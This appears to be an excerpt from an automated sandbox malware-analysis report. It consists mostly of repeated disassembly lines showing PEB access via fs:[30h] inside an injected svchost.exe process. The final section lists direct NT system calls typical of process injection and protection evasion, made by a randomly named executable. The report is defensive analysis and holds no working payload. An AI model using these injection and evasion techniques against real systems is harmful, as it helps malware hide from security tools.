                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]2_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]2_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]2_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]2_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]2_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]2_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]2_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]2_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]2_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]2_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]2_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]2_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]2_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]2_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]2_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]2_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728B50 mov eax, dword ptr fs:[00000030h]2_2_03728B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]2_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]2_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]2_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h]2_2_03804B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_009580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_0092A124 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_0092A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtCreateMutant: Direct from: 0x774635CC
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtWriteVirtualMemory: Direct from: 0x77462E3C
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtMapViewOfSection: Direct from: 0x77462D1C
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtResumeThread: Direct from: 0x774636AC
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtProtectVirtualMemory: Direct from: 0x77462F9C
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtSetInformationProcess: Direct from: 0x77462C5C
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtSetInformationThread: Direct from: 0x774563F9
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtNotifyChangeKey: Direct from: 0x77463C2C
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtProtectVirtualMemory: Direct from: 0x77457B2E
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe | NtAllocateVirtualMemory: Direct from: 0x77462BFC
